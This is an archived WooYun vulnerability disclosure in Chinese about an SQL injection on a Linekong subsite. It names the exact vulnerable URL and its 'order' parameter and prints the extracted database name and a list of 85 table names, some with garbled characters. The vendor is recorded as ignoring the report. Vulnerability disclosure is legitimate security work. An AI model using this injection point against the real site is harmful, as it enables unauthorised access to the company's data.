乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-16: 细节已通知厂商并且等待厂商处理中 2014-12-21: 厂商已经主动忽略漏洞,细节向公众公开
蓝港在线某分站SQL注入
注入点:http://yt.linekong.com/morei.php?types=all&order=add_time (order字段)
Database: yt_web[85 tables]+----------------------------------+| jd_activitylover_getkey_log || jd_actqvity_yertifiedphqne || jd_actqvqty || jd_actqvqty0 || jd_cdkey_z}djk_couqt || jd_cdkey_z}djk || jd_lottery_g\?80\?06 || jd_qq\?80\?06ber || jd_tempprops15 || jd_activity_newservqr_log || jd_activity_renzheng_log || jd_activity_spread_log || jd_activity_spread_playQog || jd_activity_spread_receive || jd_activity_spread_register || jd_activity_spread_relationship || jd_activity_spread_rpreader || jd_activity_tanabata_hetkey_log || jd_activity_taoabata_binding_log || jd_activity_tuiguang_child || jd_activity_tuiguang_log || jd_activity_tuiguang_qarent || jd_activity_whcltuiguang_child || jd_activity_whcltuiguang_lqg || jd_activity_whcltuiguang_parent || jd_actiyity_loverabinding_log || jd_actiyqty_fanpai_log || jd_actqvity_ganqai_qard || jd_addrqss || jd_article || jd_article_inserl || jd_byild || jd_channel || jd_chlunns || jd_comment || jd_dcj_temp || jd_dditoys_inserl || jd_demo || jd_dewnload || jd_flqsh || jd_grading || jd_group || jd_lottery_20091201_cdkey || jd_lottery_20091201_log || jd_lottery_2odekey || jd_lottery_codekey_click_log || jd_lottery_codekey_mog || jd_lottery_paytop || jd_lottery_paytopbcqkey || jd_mmage_ioserl || jd_ploy_vote || jd_ploy_voteacdkqy || jd_qoage || jd_qqssportstat || jd_sort || jd_temp_belle_user || jd_temp_belqe_frieqd || jd_temp_huapi || jd_temp_quiz || jd_temp_rops || jd_temp_tjdcwj || jd_temp_tong || jd_temp_torch_base || jd_temp_torch_id || jd_temp_torch_ranq || jd_temp_torch_user || jd_temp_torch_user_bak || jd_temp_tser815 || jd_tempprops_20091115 || jd_tempprops_20091216 || jd_tempprops_20100108 || jd_tempprops_2_res || jd_tempprops_3 || jd_tempprops_5 || jd_tempprops_res || jd_types || jd_url || jd_url_inserq || jd_vote || jd_vote_inserl || jd_vote_option || jd_wj_article || jd_wj_article_inserl || jd_wj_image || jd_wj_image_inserl |+----------------------------------+
这个你们比较在行
危害等级:无影响厂商忽略
忽略时间:2014-12-21 16:42
暂无